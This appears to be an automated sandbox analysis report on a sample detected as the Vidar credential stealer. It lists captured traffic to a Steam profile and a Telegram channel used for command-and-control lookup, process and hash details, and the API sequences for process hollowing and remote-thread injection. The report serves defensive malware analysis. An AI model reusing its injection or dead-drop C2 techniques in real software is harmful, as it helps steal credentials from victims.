2024-05-19 07:08:57 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-05-19 07:08:57 UTC	16384	IN	Data Raw: 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0d 0a 09 09 09 09 09 53 55 50 50 4f 52 54 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f Data Ascii: ef="https://help.steampowered.com/en/">SUPPORT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_co
2024-05-19 07:08:57 UTC	3768	IN	Data Raw: 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 Data Ascii: true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div
2024-05-19 07:08:57 UTC	48	IN	Data Raw: 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: ... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49743	149.154.167.99	443	3264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-19 07:08:58 UTC	85	OUT	GET /k0mono HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-05-19 07:08:58 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sun, 19 May 2024 07:08:58 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12317 Connection: close Set-Cookie: stel_ssid=50f7e1f743c53531a1_4403949904923576391; expires=Mon, 20 May 2024 07:08:58 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-05-19 07:08:58 UTC	12317	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 6d 6f 6e 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k0mono</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent

Target ID:	0
Start time:	03:08:54
Start date:	19/05/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x130000
File size:	372'736 bytes
MD5 hash:	7E74918F0790056546B862FA3E114C2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:08:54
Start date:	19/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:08:55
Start date:	19/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xad0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4.9%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	2.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	69

Executed Functions

Function 009B018D Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 009B02FC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 009B030F
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 009B032D
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 009B0351
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 009B037C
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 009B03D4
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 009B041F
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 009B045D
Wow64SetThreadContext.KERNEL32(?,?), ref: 009B0499
ResumeThread.KERNELBASE(?), ref: 009B04A8

Strings

ress, xrefs: 009B0217
GetP, xrefs: 009B020F
aryA, xrefs: 009B01D3
Load, xrefs: 009B01CB

Memory Dump Source

Source File: 00000000.00000002.1645575295.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_file.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: GetP$Load$aryA$ress
API String ID: 2687962208-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 9055f77cbc287c30e677d6952938b445c99115db97c4798f38742ae581a2cef7
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 03B1F67260024AAFDB60CF68CC80BDA77A9FF88714F158524EA1CEB341D774FA518B94

Function 0014D9D0 Relevance: 11.3, APIs: 7, Instructions: 762
encryptionthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 0014D9D3
GetCurrentThreadId.KERNEL32 ref: 0014DA18
CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0014DA47
std::_Throw_Cpp_error.LIBCPMT ref: 0014DA64
std::_Throw_Cpp_error.LIBCPMT ref: 0014DA6B
std::_Throw_Cpp_error.LIBCPMT ref: 0014DA72
std::_Throw_Cpp_error.LIBCPMT ref: 0014DA79

Part of subcall function 0013A4DD: GetLastError.KERNEL32(001565E0,0000000C), ref: 0013A52C
Part of subcall function 0013A4DD: ExitThread.KERNEL32 ref: 0013A533

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: Cpp_errorThrow_std::_$Thread$ConsoleCryptCurrentDecryptErrorExitFreeLast
String ID:
API String ID: 305932860-0
Opcode ID: 023996a4890d4a21c7a4fa98c21c76454f5354b06fe047f59835299234bbcc4e
Instruction ID: 9770e020012b809d0f7edc061d246e9bdf45fe16bfed19413b70d828a13b51b5
Opcode Fuzzy Hash: 023996a4890d4a21c7a4fa98c21c76454f5354b06fe047f59835299234bbcc4e
Instruction Fuzzy Hash: 7811C0B0688301AAEB10BBB0ED07B2A76D46F61705F144568F649960F2EBB1D884C7A3

Function 0014D4D0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 388
memorysynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00132070: std::_Xinvalid_argument.LIBCPMT ref: 00132075

VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,?,?,00000000,?,?), ref: 0014D862
CreateRemoteThread.KERNELBASE(000000FF,00000000,00000000,?,00158040,00000000,00000000), ref: 0014D96A
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0014D973

Strings

AAA, xrefs: 0014D5E3
Zero, xrefs: 0014D663

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: AllocCreateObjectRemoteSingleThreadVirtualWaitXinvalid_argumentstd::_
String ID: AAA$Zero
API String ID: 1547661312-2547618886
Opcode ID: 38926d585f7b914d02d544ae3814a7c07a55a2efce7b3034fd3f9ab389735780
Instruction ID: b3469142ebb421feb7d63e4cb648a62b3be82138d62a8896f9f757a4dd997f9b
Opcode Fuzzy Hash: 38926d585f7b914d02d544ae3814a7c07a55a2efce7b3034fd3f9ab389735780
Instruction Fuzzy Hash: 61E106716083409FDB14DF38D88576BBBE0BF99308F144A2DF998972A2D774E548CB52

Function 001408D5 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 522a54edbeb22b0d9b1a49efcfecf2d7c2b66523e0afd31588b9450f61b2d7af
Instruction ID: 19eaf654f66960b4205d07c9cc81df49c4d4fad42d46c9972695a4af3eea2547
Opcode Fuzzy Hash: 522a54edbeb22b0d9b1a49efcfecf2d7c2b66523e0afd31588b9450f61b2d7af
Instruction Fuzzy Hash: EAF06571610224DBDB27DB4DC545A59B3ACEB49B55F110056F605EB161C774DE40C7E0

Function 00140278 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,E05CB022,?,00140385,?,?,?,00000000), ref: 00140339

Strings

api-ms-, xrefs: 001402CF
ext-ms-, xrefs: 001402E3

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 6f61e275816c31eab94dba8ad715f272365757683b43a49c3dfc14e2d6e0996c
Instruction ID: 780b2d2b93fae886032ca09cecacdf5271a2c10ab42bdc3050517bdb40603810
Opcode Fuzzy Hash: 6f61e275816c31eab94dba8ad715f272365757683b43a49c3dfc14e2d6e0996c
Instruction Fuzzy Hash: FF21D876A01110AFCB229F769C84A5A3B68BF4A770F250114FE15A72F1D770EE01C6D0

Function 0013A675 Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?,Function_0000A519,00000000,?,?), ref: 0013A6BE
GetLastError.KERNEL32 ref: 0013A6CA
__dosmaperr.LIBCMT ref: 0013A6D1

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 8793871d4b38d8c28596514099a9a0436a8cbb619396ca42c429ad261f34ecc6
Instruction ID: 39daf05078b97670112378df28971c466d2ec59a5c52307cd24049b711dcd60d
Opcode Fuzzy Hash: 8793871d4b38d8c28596514099a9a0436a8cbb619396ca42c429ad261f34ecc6
Instruction Fuzzy Hash: 0D01BCB6500219AFCF199FA0DC06AAE3BA8FF00364F444058F84297190DB71DE50DB92

Function 00132832 Relevance: 4.5, APIs: 3, Instructions: 33
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000), ref: 0013283E
GetExitCodeThread.KERNEL32(?,?), ref: 00132857
FindCloseChangeNotification.KERNELBASE(?), ref: 00132869

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: ChangeCloseCodeExitFindNotificationObjectSingleThreadWait
String ID:
API String ID: 3816883391-0
Opcode ID: 6887acdbea930e7893cfc2a81d55a5b310e7369634490881e8c92fe6925f5519
Instruction ID: ad352b82faee48e93b03de51f26e94441864db0c1767ec9c7b60405b1874442b
Opcode Fuzzy Hash: 6887acdbea930e7893cfc2a81d55a5b310e7369634490881e8c92fe6925f5519
Instruction Fuzzy Hash: 23F05E31600119ABEB205F68DC05B997BE9EB02770F240350F925EA1F0D371DE919690

Function 0013A5CE Relevance: 4.5, APIs: 3, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0013FC81: GetLastError.KERNEL32(00000000,?,0013C926,0014005D,?,?,0013FB7D,00000001,00000364,?,00000003,000000FF,?,0013A53E,001565E0,0000000C), ref: 0013FC85
Part of subcall function 0013FC81: SetLastError.KERNEL32(00000000), ref: 0013FD27

CloseHandle.KERNEL32(?,?,?,0013A705,?,?,0013A577,00000000), ref: 0013A5FF
FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,0013A705,?,?,0013A577,00000000), ref: 0013A615
ExitThread.KERNEL32 ref: 0013A61E

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary
String ID:
API String ID: 1991824761-0
Opcode ID: 5dcbf2e40aca8ddcb115200d2e938524100513982cacbe7bbc5337ba2d57d616
Instruction ID: 6932a594f84eb2a0af187421d86d75e3d6ae6ebf587715af1694fb72e1d2dac0
Opcode Fuzzy Hash: 5dcbf2e40aca8ddcb115200d2e938524100513982cacbe7bbc5337ba2d57d616
Instruction Fuzzy Hash: 50F05EB09006046BDB355B25CD0AA5A3BA86F01364F4C4A18F8A5C75B0D730EC8586A2

Function 0013D8AC Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000002,?,0013D8A6,0013A754,0013A754,?,00000002,E05CB022,0013A754,00000002), ref: 0013D8BD
TerminateProcess.KERNEL32(00000000,?,0013D8A6,0013A754,0013A754,?,00000002,E05CB022,0013A754,00000002), ref: 0013D8C4
ExitProcess.KERNEL32 ref: 0013D8D6

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 27dc28eda1b6bddbab5b622bf9d464e1f5f59123a8ef5d0192d12f7049b5603c
Instruction ID: 4e0a18fd275128ca29fa0372b3cbf9450361eb74d96e48cf5d4f2bd27d1cd4a9
Opcode Fuzzy Hash: 27dc28eda1b6bddbab5b622bf9d464e1f5f59123a8ef5d0192d12f7049b5603c
Instruction Fuzzy Hash: CED09235100508EFDF112F60FC0D98D7F6ABF55355B008060F9295B432DBB699929BA0

Function 00142647 Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00141D91: GetConsoleOutputCP.KERNEL32(E05CB022,00000000,00000000,0013B0B8), ref: 00141DF4

WriteFile.KERNEL32(FFAC3BE8,00000000,?,0013AFD8,00000000,00000000,00000000,00000000,0013A721,?,0013AFD8,0013A721,00000024,00156660,00000010,0013B0B8), ref: 001427B0
GetLastError.KERNEL32(?,0013AFD8,0013A721,00000024,00156660,00000010,0013B0B8,0013A721,?,00000000,00000004), ref: 001427BA

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 8705eaea60c9505edc508b63cf5b09eb73c9c868a6c31e528dd4fbbba2337352
Instruction ID: d030e636f92e0c5bd61f3cfb94097e8ae9b05868ffef385c9d1a6ebae488275a
Opcode Fuzzy Hash: 8705eaea60c9505edc508b63cf5b09eb73c9c868a6c31e528dd4fbbba2337352
Instruction Fuzzy Hash: D661C1B1D00149AFDF15CFA8C884EEEBBB9AF29304F954095F804B7262D775D981CBA0

Function 00133C45 Relevance: 3.1, APIs: 2, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_Fputc.LIBCPMT ref: 00133D1E

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: Fputc
String ID:
API String ID: 3078413507-0
Opcode ID: 275c0426a97c07585297076cb97bb29258dfe1f7e6a04105e522cc4f87ae3db0
Instruction ID: 3acfdb3f23f76a76dfb434f192693bee523230bfb92378716f3f915e5318c67e
Opcode Fuzzy Hash: 275c0426a97c07585297076cb97bb29258dfe1f7e6a04105e522cc4f87ae3db0
Instruction Fuzzy Hash: 41416D76A0021AABCF14DF69C4808EEB7B8FF18310F545027E451A7750EB31EE55CB94

Function 00142249 Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,0013B0B8,?,00142796,?,00000000,00000000,?,00000000,00000000), ref: 001422E5
GetLastError.KERNEL32(?,00142796,?,00000000,00000000,?,00000000,00000000,00000000,0013A721,?,0013AFD8,0013A721,00000024,00156660,00000010), ref: 0014230B

Memory Dump Source

Source File: 00000000.00000002.1645379682.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true

Associated: 00000000.00000002.1645364830.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645400609.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645416850.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1645464056.000000000018D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_130000_file.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
